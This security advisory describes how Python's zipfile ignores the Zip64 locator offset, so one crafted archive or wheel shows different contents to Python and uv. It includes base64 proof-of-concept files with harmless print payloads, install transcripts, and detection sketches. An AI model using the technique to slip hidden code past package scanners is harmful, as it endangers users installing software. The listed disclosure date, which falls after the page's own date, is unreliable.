Python - Zip64 Locator Offset Vulnerability
2025-10-26 23:58:58 Author: github.com

Summary

It is possible to craft a zip file that, when parsed by Python's zipfile implementation, returns different contents from other common zip implementations. This happens because Python ignores the offset stored in the Zip64 end-of-central-directory locator record. Instead, Python's implementation expects the Zip64 end-of-central-directory record to sit immediately before the locator record. As a result, an archive can contain two Zip64 end-of-central-directory records: one pointed to by the offset in the locator record, which other implementations use, and one placed immediately before the locator record, which Python uses.
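The following Python sketch makes the two interpretations concrete. It computes both candidate positions for the Zip64 end-of-central-directory record: the one named by the locator's offset field, which most readers follow, and the one immediately before the locator, which Python's zipfile reads. It assumes a single-disk archive with no trailing archive comment, so that the classic end-of-central-directory record occupies the last 22 bytes. The function names are hypothetical.

```python
import struct

# Record layouts, written to match the struct format strings used by CPython's zipfile.
LOCATOR_FMT = "<4sLQL"      # signature, disk holding the Zip64 EOCD, Zip64 EOCD offset (reloff), total disks
EOCD64_FMT = "<4sQ2H2L4Q"   # fixed fields of the Zip64 end-of-central-directory record
EOCD_SIZE = 22              # classic end-of-central-directory record, assuming no archive comment
LOCATOR_SIZE = struct.calcsize(LOCATOR_FMT)  # 20 bytes
EOCD64_SIZE = struct.calcsize(EOCD64_FMT)    # 56 bytes


def zip64_eocd_candidates(data: bytes) -> tuple[int, int]:
    """Return (offset named by the locator, offset of the record just before the locator)."""
    # With no archive comment, the locator sits directly before the final 22-byte EOCD.
    locator_pos = len(data) - EOCD_SIZE - LOCATOR_SIZE
    sig, _disk, reloff, _disks = struct.unpack_from(LOCATOR_FMT, data, locator_pos)
    if sig != b"PK\x06\x07":
        raise ValueError("no Zip64 end-of-central-directory locator found")
    # Readers that follow the locator seek to reloff; Python's zipfile instead
    # assumes a fixed-size record that ends exactly where the locator begins.
    fixed_pos = locator_pos - EOCD64_SIZE
    return reloff, fixed_pos


def is_eocd64(data: bytes, pos: int) -> bool:
    """True if a Zip64 end-of-central-directory signature starts at pos."""
    return 0 <= pos <= len(data) - 4 and data[pos:pos + 4] == b"PK\x06\x06"
```

In a well-formed archive the two offsets coincide. For an archive built like the proof of concept below, they differ and both point at a valid Zip64 end-of-central-directory signature.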

Exploiting this requires user interaction. An attack using this technique would also require different zip parsing implementations to be used at different stages of handling the zip file. For example, Python wheel files may be handled both by Python's zipfile and by "uv".

Severity

Moderate - This vulnerability can be leveraged to hide malicious content that evades detection.

Proof of Concept

Single File Zip

The following base64-encoded string is a specially crafted zip file that serves as a simple proof of concept.

$ echo "UEsDBBQAAAAAAAAAIQBLlVV3CwAAAAsAAAALAAAAYm9yaW5nX2ZpbGVub3QgcHl0aG9uClBLAQIUAxQAAAAAAAAAIQBLlVV3CwAAAAsAAAALAAAAAAAAAAAAAAC0AQAAAABib3JpbmdfZmlsZVBLBgYsAAAAAAAAAC0ALQAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAA5AAAAAAAAADQAAAAAAAAAUEsDBBQAAAAAAAAAIQBh7IWUCgAAAAoAAAAHAAAAcHlfZmlsZWlzIHB5dGhvbgpQSwECFAMUAAAAAAAAACEAYeyFlAoAAAAKAAAABwAAAAAAAAAAAAAAtAGlAAAAcHlfZmlsZVBLBgYsAAAAAAAAAC0ALQAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAA1AAAAAAAAANQAAAAAAAAAUEsGBwAAAABtAAAAAAAAAAEAAABQSwUGAAAAAAEAAQA5AAAANAAAAAAA" | base64 -d > poc.zip

When extracted with Python, the archive yields a file called py_file containing "is python".

When extracted with other zip implementations, it yields a file called boring_file containing "not python".

Extracting with Python:

$ mkdir ~/py && cd ~/py
$ python3 -c "import zipfile; zipfile.ZipFile('../poc.zip').extractall()"
$ ls
py_file
$ cat py_file
is python

Extracting with unzip (InfoZip):

$ mkdir ~/unzip && cd ~/unzip
$ unzip ../poc.zip
Archive:  ../poc.zip
 extracting: boring_file             
$ cat boring_file
not python

Implementations that output boring_file include:

  • Go
  • java.util.zip (seek and streaming)
  • InfoZip (unzip)
  • MiniZip (zlib)
  • PHP
  • zip + async_zip Rust crates (seek and streaming)
  • Yauzl (npm)
  • net.lingala.zip4j (Maven)
  • libarchive (bsdunzip)
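The divergence can also be observed without extracting anything, by listing the central directory that each Zip64 end-of-central-directory record references. The sketch below assumes no data is prepended to the archive (so the central directory offset is used as an absolute file offset) and decodes names as UTF-8 for simplicity. The function name is hypothetical. For poc.zip, the record named by the locator's offset (byte 109) lists boring_file, while the record immediately before the locator (byte 265) lists py_file.

```python
import struct

EOCD64_FMT = "<4sQ2H2L4Q"  # Zip64 end-of-central-directory record, fixed fields
CDIR_HEADER_SIZE = 46      # fixed part of a central directory file header


def central_directory_names(data: bytes, eocd64_pos: int) -> list[str]:
    """List the file names in the central directory referenced by one Zip64 EOCD record."""
    (sig, _size, _made, _needed, _disk, _cd_disk,
     _n_disk, n_total, _cd_size, cd_offset) = struct.unpack_from(EOCD64_FMT, data, eocd64_pos)
    if sig != b"PK\x06\x06":
        raise ValueError(f"no Zip64 EOCD record at offset {eocd64_pos}")
    names = []
    pos = cd_offset  # assumes nothing was prepended to the archive
    for _ in range(n_total):
        if data[pos:pos + 4] != b"PK\x01\x02":
            raise ValueError(f"bad central directory header at offset {pos}")
        # File name, extra field and comment lengths are at bytes 28..33 of the header.
        name_len, extra_len, comment_len = struct.unpack_from("<3H", data, pos + 28)
        start = pos + CDIR_HEADER_SIZE
        names.append(data[start:start + name_len].decode("utf-8"))
        pos = start + name_len + extra_len + comment_len
    return names
```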

Wheel

The following base64-encoded string is a specially crafted wheel file that further demonstrates the flaw and a potential attack scenario.

$ echo "UEsDBBQAAAAAAAAAIQAi5N7ufAAAAHwAAAAlAAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9NRVRBREFUQU1ldGFkYXRhLVZlcnNpb246IDIuNApOYW1lOiBjYndoZWVsemlwNjQKVmVyc2lvbjogMC4wLjEKU3VtbWFyeTogTW9yZSBteXN0ZXJpZXMKQXV0aG9yLWVtYWlsOiBDYWxlYiA8Y2FsZWJicm93bkBnb29nbGUuY29tPgpQSwMEFAAAAAAAAAAhAN1AXn1kAAAAZAAAACIAAABjYndoZWVsemlwNjQtMC4wLjEuZGlzdC1pbmZvL1dIRUVMV2hlZWwtVmVyc2lvbjogMS4wCkdlbmVyYXRvcjogZmxpdCAzLjEyLjAKUm9vdC1Jcy1QdXJlbGliOiB0cnVlClRhZzogcHkyLW5vbmUtYW55ClRhZzogcHkzLW5vbmUtYW55ClBLAwQUAAAAAAAAACEAXL6g5HABAABwAQAAIwAAAGNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vUkVDT1JEY2J3aGVlbHppcDY0L19faW5pdF9fLnB5LHNoYTI1Nj01NTU0ZWNiZTNmOTYyMjk4Mzc3NDE1NzdhZTJkMmYyODVmMTUwOTYxOThmYWViZGFhYTFmNDVmMTlkMzQ5YjQwLDIxCmNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vV0hFRUwsc2hhMjU2PTBmMmI3YTQ4MTdkYTZhYzU4NDk1NGFkNDQ2NDkyNzU0NTAxOTBjNzQ5M2MzMTgzNzNkYTRmMzZiYjQ1MjZlNDYsMTAwCmNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vTUVUQURBVEEsc2hhMjU2PTkwNDc2ZGUxNDFiYzc4NzA0YjQzY2I4NjBhNDIzYTFmYTA0ZmU1NTc1ODQ3MjZhNzUxMWQyYTk0MTkyYzlmOTMsMTI0CmNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vUkVDT1JELCwwMDAzNjhQSwMEFAAAAAAAAAAhAAnQ9UkVAAAAFQAAABgAAABjYndoZWVsemlwNjQvX19pbml0X18ucHlwcmludCgibWFnaWMiKQojINaEk5lQSwECFAMUAAAAAAAAACEAIuTe7nwAAAB8AAAAJQAAAAAAAAAAAAAAtAEAAAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9NRVRBREFUQVBLAQIUAxQAAAAAAAAAIQDdQF59ZAAAAGQAAAAiAAAAAAAAAAAAAAC0Ab8AAABjYndoZWVsemlwNjQtMC4wLjEuZGlzdC1pbmZvL1dIRUVMUEsBAhQDFAAAAAAAAAAhAFy+oORwAQAAcAEAACMAAAAAAAAAAAAAALQBYwEAAGNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vUkVDT1JEUEsBAhQDFAAAAAAAAAAhAAnQ9UkVAAAAFQAAABgAAAAAAAAAAAAAALQBFAMAAGNid2hlZWx6aXA2NC9fX2luaXRfXy5weVBLBgaaAwAAAAAAAC0ALQAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAA6AQAAAAAAAF8DAAAAAAAAUEsDBBQAAAAAAAAAIQBcvqDkcAEAAHABAAAjAAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9SRUNPUkRjYndoZWVsemlwNjQvX19pbml0X18ucHksc2hhMjU2PTAxZjBhMDZjOTUxNTMyNGMxYzcwYmQ0YjQ3Yjg1NWRkNWRmMzg4ZTBlNmU4OWNlZDg4OGY2ODFmNGU3NTY3ZWYsMjEKY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9XSEVFTCxzaGEyNTY9MGYyYjdhNDgxN2RhNmFjNTg0OTU0YWQ0NDY0OTI3NTQ1MDE5MGM3NDkzYzMxODM3M2RhNGYz
NmJiNDUyNmU0NiwxMDAKY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9NRVRBREFUQSxzaGEyNTY9OTA0NzZkZTE0MWJjNzg3MDRiNDNjYjg2MGE0MjNhMWZhMDRmZTU1NzU4NDcyNmE3NTExZDJhOTQxOTJjOWY5MywxMjQKY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9SRUNPUkQsLDAwaRpgClBLAwQUAAAAAAAAACEACdD1SRUAAAAVAAAAGAAAAGNid2hlZWx6aXA2NC9fX2luaXRfXy5weXByaW50KCJtb3JlIG1hZ2ljISIpClBLAQIUAxQAAAAAAAAAIQAi5N7ufAAAAHwAAAAlAAAAAAAAAAAAAAC0AQAAAABjYndoZWVsemlwNjQtMC4wLjEuZGlzdC1pbmZvL01FVEFEQVRBUEsBAhQDFAAAAAAAAAAhAN1AXn1kAAAAZAAAACIAAAAAAAAAAAAAALQBvwAAAGNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vV0hFRUxQSwECFAMUAAAAAAAAACEAXL6g5HABAABwAQAAIwAAAAAAAAAAAAAAtAHRBAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9SRUNPUkRQSwECFAMUAAAAAAAAACEACdD1SRUAAAAVAAAAGAAAAAAAAAAAAAAAtAGCBgAAY2J3aGVlbHppcDY0L19faW5pdF9fLnB5UEsGBiwAAAAAAAAALQAtAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAADoBAAAAAAAAzQYAAAAAAABQSwYHAAAAAJkEAAAAAAAAAQAAAFBLBQYAAAAABAAEADoBAABfAwAAAAA=" | base64 -d > cbwheelzip64-0.0.1-py2.py3-none-any.whl

Installing with uv:

$ mkdir uv && cd uv
$ uv venv env
$ . env/bin/activate
$ uv pip install ../cbwheelzip64-0.0.1-py2.py3-none-any.whl 
Using Python 3.12.3 environment at: env
Resolved 1 package in 3ms
Installed 1 package in 1ms
 + cbwheelzip64==0.0.1 (from file:///home/calebbrown/cbwheelzip64-0.0.1-py2.py3-none-any.whl)

$ python3 -c 'import cbwheelzip64'
magic

Installing with pip:

$ mkdir py && cd py
$ python3 -m venv env
$ . env/bin/activate
$ pip install ../cbwheelzip64-0.0.1-py2.py3-none-any.whl
Processing /home/calebbrown/cbwheelzip64-0.0.1-py2.py3-none-any.whl
Installing collected packages: cbwheelzip64
Successfully installed cbwheelzip64-0.0.1

$ python3 -c 'import cbwheelzip64'
more magic!

Further Analysis

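# cpython/Lib/zipfile/__init__.py @ 6bf1c0ab3497b1b193812654bcdfd0c11b4192d8

# Simplified implementation, removing conditions and error handling.

import struct

# Module-level constants, computed with struct.calcsize() at import time.
structEndArchive64Locator = "<4sLQL"
sizeEndCentDir64Locator = struct.calcsize(structEndArchive64Locator)  # 20 bytes
structEndArchive64 = "<4sQ2H2L4Q"
sizeEndCentDir64 = struct.calcsize(structEndArchive64)  # 56 bytes

def _EndRecData64(fpin, offset, endrec):
    # offset is negative: the position of the classic end-of-central-directory
    # record relative to the end of the file (whence=2).
    fpin.seek(offset - sizeEndCentDir64Locator, 2)
    data = fpin.read(sizeEndCentDir64Locator)

    # reloff (the locator's pointer to the Zip64 end-of-central-directory
    # record) is unpacked here but never used below.
    sig, diskno, reloff, disks = struct.unpack(structEndArchive64Locator, data)

    # Assume no 'zip64 extensible data'
    fpin.seek(offset - sizeEndCentDir64Locator - sizeEndCentDir64, 2)
    data = fpin.read(sizeEndCentDir64)
    # ...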

The snippet above shows the current logic for reading the Zip64 end-of-central-directory record.

sizeEndCentDir64Locator and sizeEndCentDir64 are module-level constants computed with struct.calcsize() at import time.

When reading the Zip64 end-of-central-directory record, the offset stored in the Zip64 locator record (reloff) is ignored entirely. Instead, the record's position is calculated from the fixed record-size constants, relative to the end of the file.

The comment "Assume no 'zip64 extensible data'" appears to indicate that this fixed-offset behaviour is intentional, since reading the "zip64 extensible data" field would require treating the Zip64 end-of-central-directory record as variable-sized.
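To illustrate what treating the record as variable-sized involves, the sketch below parses a Zip64 end-of-central-directory record from a known starting offset, such as the one supplied by the locator, and uses the record's own size field to recover any extensible data. Per the PKWARE APPNOTE, that size field excludes the leading 12 bytes (the signature and the size field itself). Working backwards from the locator with a fixed 56-byte size cannot find the start of a record that carries extensible data. The function name is hypothetical.

```python
import struct

EOCD64_FMT = "<4sQ2H2L4Q"
EOCD64_FIXED_SIZE = struct.calcsize(EOCD64_FMT)  # 56 bytes of fixed fields
LEADING_BYTES = 12  # signature (4) + size field (8), not counted by the size field


def read_eocd64(data: bytes, pos: int) -> tuple[tuple, bytes]:
    """Parse a Zip64 EOCD record at pos, returning (fixed fields, extensible data)."""
    fields = struct.unpack_from(EOCD64_FMT, data, pos)
    if fields[0] != b"PK\x06\x06":
        raise ValueError(f"no Zip64 EOCD record at offset {pos}")
    # fields[1] is the "size of remaining record" value.
    total_len = LEADING_BYTES + fields[1]
    if total_len < EOCD64_FIXED_SIZE or pos + total_len > len(data):
        raise ValueError("Zip64 EOCD size field is out of range")
    # Anything beyond the 56 fixed bytes is the zip64 extensible data sector.
    extensible = data[pos + EOCD64_FIXED_SIZE:pos + total_len]
    return fields, extensible
```

A record with a size field of 44 has no extensible data; any larger value means the record is longer than 56 bytes.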

However, by making this assumption, Python's zip implementation differs from the majority of other implementations, which do use the offset from the Zip64 locator record.

Finally, the no-extensible-data assumption is never validated: the locator's reloff value is not checked against the position of the Zip64 end-of-central-directory record that Python actually reads. This means reloff can point to a separate Zip64 end-of-central-directory record that describes different content from the one Python reads.
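A minimal sketch of the missing validation follows, assuming (as the APPNOTE's overall archive layout shows) that the Zip64 end-of-central-directory record is immediately followed by the locator. The record named by reloff must carry the correct signature, and its own size field must place its end exactly at the locator. This is an illustrative check rather than CPython's code; the function name is hypothetical, and it again assumes a single-disk archive with no trailing comment.

```python
import struct

LOCATOR_FMT = "<4sLQL"
EOCD64_HEAD_FMT = "<4sQ"  # signature + "size of remaining record"
EOCD_SIZE = 22            # classic EOCD, assuming no archive comment
LOCATOR_SIZE = struct.calcsize(LOCATOR_FMT)


def check_zip64_locator(data: bytes) -> int:
    """Return the Zip64 EOCD offset if the locator and record agree, else raise ValueError."""
    locator_pos = len(data) - EOCD_SIZE - LOCATOR_SIZE
    sig, _disk, reloff, _disks = struct.unpack_from(LOCATOR_FMT, data, locator_pos)
    if sig != b"PK\x06\x07":
        raise ValueError("no Zip64 locator found")
    # The 12-byte record header must fit before the locator.
    if reloff + 12 > locator_pos:
        raise ValueError("locator offset points at or past the locator")
    rec_sig, remaining = struct.unpack_from(EOCD64_HEAD_FMT, data, reloff)
    if rec_sig != b"PK\x06\x06":
        raise ValueError(f"no Zip64 EOCD record at offset {reloff}")
    # The record's size field excludes its first 12 bytes.
    record_end = reloff + 12 + remaining
    if record_end != locator_pos:
        raise ValueError(
            f"Zip64 EOCD at {reloff} ends at {record_end}, "
            f"but the locator starts at {locator_pos}"
        )
    return reloff
```

Against poc.zip this check raises ValueError, because the record named by reloff ends well before the locator.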

Timeline

Date reported: 07/28/2025
Date fixed:
Date disclosed: 10/27/2026


Source: https://github.com/google/security-research/security/advisories/GHSA-hhv7-p4pg-wm6p